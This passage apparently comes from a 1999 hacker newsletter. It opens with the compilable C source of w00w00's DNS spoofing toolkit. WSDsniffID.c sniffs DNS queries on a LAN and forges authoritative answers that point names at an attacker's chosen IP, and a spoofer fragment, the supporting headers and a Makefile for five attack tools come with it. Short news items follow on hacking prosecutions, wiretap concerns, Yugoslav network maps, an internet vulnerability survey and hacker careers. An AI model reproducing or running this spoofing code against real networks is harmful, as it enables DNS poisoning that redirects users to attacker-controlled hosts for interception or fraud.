udp = (struct udphdr *)(buf+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
if (ip->protocol == IPPROTO_UDP) {
printf("[%s:%d ->", (char *)inet_ntoa(ip->saddr), ntohs(udp->source));
printf("%s:%d]\n", (char *)inet_ntoa(ip->daddr), ntohs(udp->dest));
}
if (ip->protocol == 17)
if (ip->saddr.s_addr == d_ip)
if (ip->daddr.s_addr == s_ipns)
if (udp->dest == htons(53))
if (dnsrecv->qr == 0) {
printf("We have the packet!\n");
ID = dnsrecv->id; /* We have the id. */
printf("the current id of %s is %d \n", argv[2],
ntohs(ID));
DA_ID = ntohs(ID);
printf("Sending the spoof...\n");
dnsspoof(dnstrust, argv[2], spoofname, spoofip,
DA_ID,type);
printf("Spoof sent...\n");
exit(0);
}
}
}
----[END of WSDspoofID.c ]----
----[WSDsniffID.c]----
/* ******************************************************* */
/* w00w00 LAN ID Sniffer Super Raw */
/* ------------------------------------------------------- */
/* w00w00 Security Development (WSD) */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */
#include <pcap.h>
#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"
#define ERROR -1
#define DNSHDRSIZE 12
#define VERSION "v0.4"
int ETHHDRSIZE;
void usage() {
printf("Usage: WSDsniffID <device> <IP> <name> <type of spoof[1,12]>\n");
printf("Example: WSDsniffID eth0 \"127.0.0.1\" \"www.its.me.com\"\n");
printf("Raw-Powa (WSD)\n");
exit(ERROR);
}
void main(int argc, char **argv)
{
int sraw, on = 1, tmp1, type;
char *buffer;
char *data, *data2;
struct pcap *pcap_d;
struct pcap_pkthdr h;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv, *dnssend;
char host[255];
char tmp2[255];
char ebuf[255];
char buffer2[1024];
char spoofip[255], spoofname[255];
unsigned char names[255];
printf("w00w00 LAN ID SNIFFER! Super Raw\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");
if (argc < 2) usage();
if (strstr(argv[1], "ppp0")) ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;
if (strlen(argv[2]) > sizeof(spoofip) - 1) {
fprintf(stderr, "argv[2] too long: %s\n", argv[2]);
exit(ERROR);
}
if (strlen(argv[3]) > sizeof(spoofip) - 1) {
fprintf(stderr, "argv[3] too long: %s\n", argv[3]);
exit(ERROR);
}
strcpy(spoofip, argv[2]);
strcpy(spoofname, argv[3]);
type = atoi(argv[4]);
dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+12);
bzero(host, sizeof(host));
bzero(buffer2, sizeof(buffer2));
sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}
if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("setsockopt");
exit(ERROR);
}
/* open pcap descriptor */
pcap_d = pcap_open_live(argv[1], sizeof(buffer), 0, 100, ebuf);
while(1) {
buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */
ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
if (ip->protocol == 17)
if (udp->dest == htons(53))
if (dnsrecv->qr == 0) {
strcpy(names, data);
nameformat(names, host);
printf("We have a DNS question from %s, which wants: %s!\n",
(char *)inet_ntoa(ip->saddr), host);
bzero(host, sizeof(host));
printf("The question has a type %d "
"and type of the query is %d\n",
ntohs(*((u_short *)(data+strlen(data)+1))),
ntohs(*((u_short *)(data+strlen(data)+2+1))));
printf("Making the spoofed packet...\n");
/* Here we are going to start making the spoofed packet */
memcpy(dnssend, dnsrecv, DNSHDRSIZE+strlen(names)+5);
dnssend->id=dnsrecv->id; /* The ID */
dnssend->aa=1; /* I have the authority */
dnssend->ra=1; /* I have the recusion */
dnssend->qr=1; /* It's an answer */
dnssend->rep_num = htons(1); /* I have one awnser */
printf("ID = %d, Number of question = %d, "
"number of anwser = %d\n",
dnssend->id, ntohs(dnssend->que_num),
ntohs(dnssend->rep_num));
printf("Question..\n");
printf("domainename = %s\n", data2);
printf("type of question = %d\n",
ntohs(*((u_short *)(data2+strlen(names)+1))));
printf("type of query = %d\n",
ntohs(*((u_short *)(data2+strlen(names)+1+2))));
if (type == TYPE_PTR) {
tmp1 = strlen(names)+5;
strcpy(data2+tmp1, names);
tmp1 = tmp1+strlen(names)+1;
bzero(tmp2, sizeof(tmp2));
nameformat(spoofname, tmp2);
*((u_short *)(data2+tmp1)) = htons(TYPE_PTR);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1));
strcpy((data2+tmp1+2+2+4+2), tmp2);
tmp1 = tmp1 +strlen(tmp2)+ 1;
}
if (type == TYPE_A) {
tmp1 = strlen(names)+5;
strcpy(data2+tmp1, names);
tmp1 = tmp1+strlen(names)+1;
*((u_short *)(data2+tmp1)) = htons(TYPE_A);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(4);
*((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(spoofip);
}
printf("Answer..\n");
printf("domainname = %s\n", tmp2);
printf("type = %d\n", ntohs(*((u_short *)(data2+tmp1))));
printf("classe = %d\n", ntohs(*((u_short *)(data2+tmp1+2))));
printf("time to live = %lu\n",
ntohl(*((u_long *)(data2+tmp1+2+2))));
printf("resource data length = %d\n",
ntohs(*((u_short *)(data2+tmp1+2+2+4))));
printf("IP = %s\n",
(char *)inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));
/* Now tmp1 == the total length of packet dns without the */
/* dnshdr. */
tmp1 = tmp1+2+2+4+2+4;
udp_send(sraw, ip->daddr, ip->saddr, ntohs(udp->dest),
ntohs(udp->source), buffer2, DNSHDRSIZE+tmp1);
}
}
}
----[END of WSDsniffID.c ]----
----[udp.h ]----
struct udphdr {
u_short source; /* source port */
u_short dest; /* destination port */
u_short len; /* udp length */
u_short check; /* udp checksum */
};
----[END of udp.h]----
----[ dns.h ]----
#define DNSHDRSIZE 12
struct dnshdr {
unsigned short int id;
unsigned char rd:1;
unsigned char tc:1;
unsigned char aa:1;
unsigned char opcode:4;
unsigned char qr:1;
unsigned char rcode:4;
unsigned char unused:2;
unsigned char pr:1;
unsigned char ra:1;
unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
};
----[ END of dns.h ]----
----[ ip.h ]----
/* adapted from tcpdump */
#ifndef IPVERSION
#define IPVERSION 4
#endif /* IPVERISON */
struct iphdr {
u_char ihl:4, /* header length */
version:4; /* version */
u_char tos; /* type of service */
short tot_len; /* total length */
u_short id; /* identification */
short off; /* fragment offset field */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
u_char ttl; /* time to live */
u_char protocol; /* protocol */
u_short check; /* checksum */
struct in_addr saddr, daddr; /* source and dest address */
};
#ifndef IP_MAXPACKET
#define IP_MAXPACKET 65535
#endif /* IP_MAXPACKET */
----[ END of ip.h ]----
----[bpf.h]----
/*-
* Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* This code is derived from the Stanford/CMU enet packet filter,
* (net/enet.c) distributed as part of 4.3BSD, and code contributed
* to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
* Berkeley Laboratory.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the University of
* California, Berkeley and its contributors.
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#)bpf.h 7.1 (Berkeley) 5/7/91
*
* @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
*/
#ifndef BPF_MAJOR_VERSION
/* BSD style release date */
#define BPF_RELEASE 199606
typedef int bpf_int32;
typedef u_int bpf_u_int32;
/*
* Alignment macros. BPF_WORDALIGN rounds up to the next
* even multiple of BPF_ALIGNMENT.
*/
#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))
#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32
/*
* Structure for BIOCSETF.
*/
struct bpf_program {
u_int bf_len;
struct bpf_insn *bf_insns;
};
/*
* Struct returned by BIOCGSTATS.
*/
struct bpf_stat {
u_int bs_recv; /* number of packets received */
u_int bs_drop; /* number of packets dropped */
};
/*
* Struct return by BIOCVERSION. This represents the version number of
* the filter language described by the instruction encodings below.
* bpf understands a program iff kernel_major == filter_major &&
* kernel_minor >= filter_minor, that is, if the value returned by the
* running kernel has the same major number and a minor number equal
* equal to or less than the filter being downloaded. Otherwise, the
* results are undefined, meaning an error may be returned or packets
* may be accepted haphazardly.
* It has nothing to do with the source code version.
*/
struct bpf_version {
u_short bv_major;
u_short bv_minor;
};
/* Current version number of filter architecture. */
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1
/*
* BPF ioctls
*
* The first set is for compatibility with Sun's pcc style
* header files. If your using gcc, we assume that you
* have run fixincludes so the latter set should work.
*/
#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define BIOCGBLEN _IOR(B,102, u_int)
#define BIOCSBLEN _IOWR(B,102, u_int)
#define BIOCSETF _IOW(B,103, struct bpf_program)
#define BIOCFLUSH _IO(B,104)
#define BIOCPROMISC _IO(B,105)
#define BIOCGDLT _IOR(B,106, u_int)
#define BIOCGETIF _IOR(B,107, struct ifreq)
#define BIOCSETIF _IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT _IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT _IOR(B,110, struct timeval)
#define BIOCGSTATS _IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW(B,112, u_int)
#define BIOCVERSION _IOR(B,113, struct bpf_version)
#define BIOCSTCPF _IOW(B,114, struct bpf_program)
#define BIOCSUDPF _IOW(B,115, struct bpf_program)
#else
#define BIOCGBLEN _IOR('B',102, u_int)
#define BIOCSBLEN _IOWR('B',102, u_int)
#define BIOCSETF _IOW('B',103, struct bpf_program)
#define BIOCFLUSH _IO('B',104)
#define BIOCPROMISC _IO('B',105)
#define BIOCGDLT _IOR('B',106, u_int)
#define BIOCGETIF _IOR('B',107, struct ifreq)
#define BIOCSETIF _IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT _IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT _IOR('B',110, struct timeval)
#define BIOCGSTATS _IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW('B',112, u_int)
#define BIOCVERSION _IOR('B',113, struct bpf_version)
#define BIOCSTCPF _IOW('B',114, struct bpf_program)
#define BIOCSUDPF _IOW('B',115, struct bpf_program)
#endif
/*
* Structure prepended to each packet.
*/
struct bpf_hdr {
struct timeval bh_tstamp; /* time stamp */
bpf_u_int32 bh_caplen; /* length of captured portion */
bpf_u_int32 bh_datalen; /* original length of packet */
u_short bh_hdrlen; /* length of bpf header (this struct
plus alignment padding) */
};
/*
* Because the structure above is not a multiple of 4 bytes, some compilers
* will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
* Only the kernel needs to know about it; applications use bh_hdrlen.
*/
#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif
/*
* Data-link level type codes.
*/
#define DLT_NULL 0 /* no link-layer encapsulation */
#define DLT_EN10MB 1 /* Ethernet (10Mb) */
#define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */
#define DLT_AX25 3 /* Amateur Radio AX.25 */
#define DLT_PRONET 4 /* Proteon ProNET Token Ring */
#define DLT_CHAOS 5 /* Chaos */
#define DLT_IEEE802 6 /* IEEE 802 Networks */
#define DLT_ARCNET 7 /* ARCNET */
#define DLT_SLIP 8 /* Serial Line IP */
#define DLT_PPP 9 /* Point-to-point Protocol */
#define DLT_FDDI 10 /* FDDI */
#define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */
#define DLT_RAW 12 /* raw IP */
#define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */
#define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */
/*
* The instruction encondings.
*/
/* instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD 0x00
#define BPF_LDX 0x01
#define BPF_ST 0x02
#define BPF_STX 0x03
#define BPF_ALU 0x04
#define BPF_JMP 0x05
#define BPF_RET 0x06
#define BPF_MISC 0x07
/* ld/ldx fields */
#define BPF_SIZE(code) ((code) & 0x18)
#define BPF_W 0x00
#define BPF_H 0x08
#define BPF_B 0x10
#define BPF_MODE(code) ((code) & 0xe0)
#define BPF_IMM 0x00
#define BPF_ABS 0x20
#define BPF_IND 0x40
#define BPF_MEM 0x60
#define BPF_LEN 0x80
#define BPF_MSH 0xa0
/* alu/jmp fields */
#define BPF_OP(code) ((code) & 0xf0)
#define BPF_ADD 0x00
#define BPF_SUB 0x10
#define BPF_MUL 0x20
#define BPF_DIV 0x30
#define BPF_OR 0x40
#define BPF_AND 0x50
#define BPF_LSH 0x60
#define BPF_RSH 0x70
#define BPF_NEG 0x80
#define BPF_JA 0x00
#define BPF_JEQ 0x10
#define BPF_JGT 0x20
#define BPF_JGE 0x30
#define BPF_JSET 0x40
#define BPF_SRC(code) ((code) & 0x08)
#define BPF_K 0x00
#define BPF_X 0x08
/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code) ((code) & 0x18)
#define BPF_A 0x10
/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define BPF_TAX 0x00
#define BPF_TXA 0x80
/*
* The instruction data structure.
*/
struct bpf_insn {
u_short code;
u_char jt;
u_char jf;
bpf_int32 k;
};
/*
* Macros for insn array initializers.
*/
#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }
#ifdef KERNEL
extern u_int bpf_filter();
extern void bpfattach();
extern void bpf_tap();
extern void bpf_mtap();
#else
#if __STDC__
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
#endif
#endif
/*
* Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
*/
#define BPF_MEMWORDS 16
#endif
----[ END of bpf.h ]----
---[pcap.h ]---
/*
* Copyright (c) 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the Computer Systems
* Engineering Group at Lawrence Berkeley Laboratory.
* 4. Neither the name of the University nor of the Laboratory may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
*/
#ifndef lib_pcap_h
#define lib_pcap_h
#include <sys/types.h>
#include <sys/time.h>
#include <bpf.h>
#include <stdio.h>
#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4
#define PCAP_ERRBUF_SIZE 256
/*
* Compatibility for systems that have a bpf.h that
* predates the bpf typedefs for 64-bit support.
*/
#if BPF_RELEASE - 0 < 199406
typedef int bpf_int32;
typedef u_int bpf_u_int32;
#endif
typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;
/*
* The first record in the file contains saved values for some
* of the flags used in the printout phases of tcpdump.
* Many fields here are 32 bit ints so compilers won't insert unwanted
* padding; these files need to be interchangeable across architectures.
*/
struct pcap_file_header {
bpf_u_int32 magic;
u_short version_major;
u_short version_minor;
bpf_int32 thiszone; /* gmt to local correction */
bpf_u_int32 sigfigs; /* accuracy of timestamps */
bpf_u_int32 snaplen; /* max length saved portion of each pkt */
bpf_u_int32 linktype; /* data link type (DLT_*) */
};
/*
* Each packet in the dump file is prepended with this generic header.
* This gets around the problem of different headers for different
* packet interfaces.
*/
struct pcap_pkthdr {
struct timeval ts; /* time stamp */
bpf_u_int32 caplen; /* length of portion present */
bpf_u_int32 len; /* length this packet (off wire) */
};
/*
* As returned by the pcap_stats()
*/
struct pcap_stat {
u_int ps_recv; /* number of packets received */
u_int ps_drop; /* number of packets dropped */
u_int ps_ifdrop; /* drops by interface XXX not yet supported */
};
typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
const u_char *);
char *pcap_lookupdev(char *);
int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t *pcap_open_live(char *, int, int, int, char *);
pcap_t *pcap_open_offline(const char *, char *);
void pcap_close(pcap_t *);
int pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
pcap_next(pcap_t *, struct pcap_pkthdr *);
int pcap_stats(pcap_t *, struct pcap_stat *);
int pcap_setfilter(pcap_t *, struct bpf_program *);
void pcap_perror(pcap_t *, char *);
char *pcap_strerror(int);
char *pcap_geterr(pcap_t *);
int pcap_compile(pcap_t *, struct bpf_program *, char *, int,
bpf_u_int32);
/* XXX */
int pcap_freecode(pcap_t *, struct bpf_program *);
int pcap_datalink(pcap_t *);
int pcap_snapshot(pcap_t *);
int pcap_is_swapped(pcap_t *);
int pcap_major_version(pcap_t *);
int pcap_minor_version(pcap_t *);
/* XXX */
FILE *pcap_file(pcap_t *);
int pcap_fileno(pcap_t *);
pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void pcap_dump_close(pcap_dumper_t *);
void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);
/* XXX this guy lives in the bpf tree */
u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char *bpf_image(struct bpf_insn *, int);
#endif
----[ END of pcap.h ]----
----[Makefile]----
# Version 0.2
SHELL = /bin/sh
# Uncomment this if you're not on Linux
#LIBS = -lsocket -lnsl -lpcap
CC = gcc
RM = /bin/rm
BIN = .
#BIN = w00w00/bins
LIBS = -lpcap
CFLAGS = -I. -L.
all: WSDkillDNS WSDspoofID WSDsniffID WSD-baddns WSD-IDpred
WSDkillDNS: WSDkillDNS.c
$(CC) $(CFLAGS) WSDkillDNS.c $(LIBS) -o $(BIN)/WSDkillDNS
WSDspoofID: WSDspoofID.c
$(CC) $(CFLAGS) WSDspoofID.c $(LIBS) -o $(BIN)/WSDspoofID
WSDsniffID: WSDsniffID.c
$(CC) $(CFLAGS) WSDsniffID.c $(LIBS) -o $(BIN)/WSDsniffID
WSD-baddns: WSD-baddns.c
$(CC) $(CFLAGS) WSD-baddns.c $(LIBS) -o $(BIN)/WSD-baddns
WSD-IDpred: WSD-IDpred.c
$(CC) $(CFLAGS) WSD-IDpred.c $(LIBS) -o $(BIN)/WSD-IDpred
----[END of Makefile ]----
@HWA
34.0 2 Swedish men charged with hacking U.S computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.usatoday.com/life/cyber/tech/ctf865.htm
2 charged for hacking U.S. computers
STOCKHOLM, Sweden (AP) -- Two Swedish men were charged
Monday with hacking into the computer systems of NASA and the U.S.
military.
Prosecutors said the intent apparently was not to steal anything, though
NASA reportedly spent a lot of money to make sure it didn't happen
again.
State prosecutor Yngve Rydberg called the crimes ''digital graffiti.'' Trial
was set for sometime this fall. Rydberg said he expected the two suburban
Stockholm men would be fined, but not jailed.
Charlie Malm and Joel Soederberg, both 24, were charged with violating
Sweden's computer laws and buying stolen equipment. Malm works at a
kindergarten, Rydberg for an Internet company.
Contacted by The Associated Press, Soederberg declined to comment.
Malm did not return a phone call placed to his home.
The NASA break-in allegedly occurred between October and December
1996. Soederberg was detained for two weeks in early 1997. Malm has
never been detained, Rydberg said.
''They didn't reach the holiest parts of the systems,'' he said, adding they
failed in an attempt to infect NASA's computer system with a virus.
The two also allegedly hacked into the computer systems of the U.S. Air
Force, Army and Marines, and the British Internet company Wide
Intellectual Resources, according to the charges.
NASA intends to demonstrate in the trial that Malm and Soederberg
''caused NASA great economic loss,'' court documents stated.
Thomas Talleur, director of NASA's computer crime unit, said the space
agency suffers a lot of intrusions.
''Anybody who provides as many open sites as we do leaves itself open to
attacks,'' he said in a telephone interview, adding that the agency mostly
investigates hacker intrusions when organized crime is suspected.
@HWA
35.0 Feds Delay network
~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by AlienPlague
The feds are delaying a joint AT&T and British telecom
venture that would create a transatlantic telecom
network. Apparently the feds want to make sure they
have access to the network for wiretapping purposes
and to protect U.S. citizens against monitoring by
foreign governments. (For some reason I don't buy the
protection part.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2315342,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
DOJ, FBI delay AT&T-BT plans
By Kathy Chen and Rebecca Blumenstein, WSJ Interactive Edition
August 16, 1999 2:32 PM PT
URL:
U.S. officials are reviewing a planned joint venture between AT&T Corp. and British
Telecommunications PLC for its possible effects on law enforcement and national security,
delaying approval of the trans-Atlantic telecom agreement.
The Federal Bureau of Investigation and the Department of Justice's criminal division are holding
talks with the companies to resolve concerns over the plan to form a $10 billion global venture,
people familiar with the situation said.
The review appears to be part of a larger trend of law-enforcement agencies weighing in on
telecommunications deals. While the Federal Communications Commission traditionally has
overseen approval of such deals, the law-enforcement agencies may want to ensure they have
access to telecom networks for approved wiretapping operations, as well as that U.S. citizens are
protected against monitoring by foreign governments.
Growing investments by foreign companies and the introduction of new phone technologies are
complicating their efforts. The result has been increased participation by the agencies in vetting
telecom deals -- and delays for the companies.
Down but not out
While the agencies' concerns aren't likely to scuttle the AT&T-BT alliance, they are holding up its
approval. FCC officials have completed their review of the venture, which was announced in July
1998, but are awaiting word from the Justice Department and FBI, which have been in talks with
the firms for more than two months, according to people familiar with the situation.
Both AT&T (NYSE:T) and BT declined to comment on whether they are involved in talks with
law-enforcement agencies. But AT&T spokesman Jim McGann said, "We continue to believe
approval of the deal is on track." The firms have said they would like to wrap up the deal by
October.
The Justice Department and FBI said they don't comment on specific cases.
The AT&T-BT venture aims to provide international companies with voice, video and data
services. The companies are combining international operations with about $10 billion in annual
revenue. European regulators, which recently have begun looking at telecom deals more carefully,
have approved the venture.
The specific nature of the FBI and Justice Department concerns remains unclear. If several past
and continuing cases offer any clue, they are likely to involve the agencies' desires to ensure
continued access to telecom networks for wiretapping purposes and to protect the privacy of U.S.
citizens.
In one of the first cases addressed by the agencies -- BT's planned acquisition of MCI
Communications announced in 1996 -- the FBI and Justice Department required the companies to
set up a separate subsidiary to take over all of MCI's business with U.S. government agencies.
The agencies also asked the companies to implement other security measures, such as agreeing
not to store billing information outside the U.S. for a certain period of time. That information is
sometimes subpoenaed by law-enforcement officials for criminal investigations, and storage in the
U.S. would facilitate continued access. The deal later fell through for unrelated reasons.
Law-enforcement agencies recently approved a merger between AirTouch Communications Inc.
and United Kingdom-based Vodafone, now Vodafone AirTouch PLC. AirTouch spokesman
Jonathan Marshall said the companies engaged in several months of negotiations with the agencies
over how to address security issues and agreed to conditions aimed at guaranteeing the
government's right to intercept communications over their U.S. wireless networks.
@HWA
36.0 The Effects of War on the Yugoslavian Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Michelle
While the NATO bombings may have had some
detrimental effects it doesn't look like Yugoslavia was
completely cut off during the war. The people at the
Internet Mapping Project compiled some graphical
network maps every day during the bombing. Pretty
interesting to look at. (Look for the mpeg at the
bottom.)
The Internet Mapping Project
http://www.cs.bell-labs.com/~ches/map
The Effects of War on the Yugoslavian Network
http://www.cs.bell-labs.com/~ches/map/yu/index.html
The effects of war on the Yugoslavian Network.
- Steven Branigan & Bill Cheswick
Starting at the end of March, we mapped the Yugoslavian network daily. A chart of the reachability shows that the network
was pretty stable until about May 3, 1999. Then, it changed drastically.
Below are some single day network map snapshots for the period from May 1st until May 10. As you can see from the
maps, a fair amount of the Yugoslavian network disappears and subsequently reappears on a daily basis.
We also mapped Bosnia during this period. Though our traces showed no common communication routes, quite a bit of
Bosnia went away at the same time. We suspect that the two countries probably share power grid connections.
http://www.cs.bell-labs.com/~ches/map/yu/index.html (maps)
@HWA
37.0 Survey Finds Internet Full of Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Using custom made software Liraz Siri, an 18 year old
from Israel, probed 36 million internet hosts for 18
common vulnerabilities. 450,000 of those servers were
vulnerable to attacks. While that is only 2% of the total
that is way to much.(Yes, we have mentioned this
before, but it is important.)
Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_184381,00.html
Interent Auditing Project Report - Via Security Focus
http://www.securityfocus.com/templates/forum-latest.html?forum=2
@HWA
38.0 Hacking Into an IT Career
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by WeldPond
Looking for a career in 'hacking'? David Del Torto,
director of technology for security services at Deloitte &
Touche in San Francisco gave out a few tips to the
attendees at the recent Chaos Computer Camp.
ComputerWorld
http://www.computerworld.com/home/news.nsf/all/9908124hackcareers
(Online News, 08/12/99 05:34 PM)
Hacking your way to an IT career
By Ann Harrison
ALTLANDSBERG, GERMANY -- At the first annual
Chaos Communication Camp, which took place outside
of Berlin last weekend (see story), hundreds of hackers
and their machines filled the main hack tent exchanging
information on the latest exploits and security tools. Most
were young, skillful and in demand by corporate
information technology departments.
The camp, which attracted some of the most talented
European and American hackers, was one of the largest
hacker gatherings in Europe so far this year.
David Del Torto, director of technology for security
services at Deloitte & Touche in San Francisco, agreed.
He noted that hackers like himself were working at all
the top five auditing and accounting firms.
Del Torto presented hacker career workshops with titles
such as "Take This Job and Ping It/Hacking The
Corporate Ladder For Fun & Profit."
The following are some of the tips he offered hackers
seeking corporate jobs:
- Write your own job description.
- Volunteer for a project in your area of expertise.
- Network with people.
- Start your own company.
Or sign on to another start-up.
He also advised the crowd to build tools they themselves
would use ("You should be customer No. 1!"), license
technology when appropriate and solve problems with
free software or generate it.
"When building reputation capital, it's pretty important to
learn to think like the boss,'' he said.
In addition to his day job, Del Torto is a member of the
Cypherpunks, a San Francisco-based hacking
organization that produces what he calls
"no-compromise" security technology.
